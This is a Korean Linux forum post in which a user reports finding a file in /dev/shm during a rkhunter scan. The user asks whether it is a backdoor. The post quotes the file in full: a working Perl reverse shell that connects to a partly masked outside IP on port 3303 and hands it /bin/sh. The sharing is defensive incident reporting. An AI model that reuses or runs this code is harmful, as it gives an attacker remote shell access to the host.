리눅스 분류
펄 프로그램인데 백도어가 맞는지
작성자 정보
- alkade 작성
- 작성일
컨텐츠 정보
- 2,948 조회
- 0 추천
- 목록
본문
안녕하세요? rkhutner 로 서버 점검을 하던중 /dev/shm /디렉토리에서 파일을 발견 하였습니다.
파일 내용은
#!/usr/bin/perl
use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(3303 ,inet_aton("xxx.xx.9.226" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";
궁금한 점이 이게 백도어가 맞느냐 아님 그냥 시스템 파일이냐가 궁금합니다.
관련자료
-
이전
-
다음
댓글 0
등록된 댓글이 없습니다.
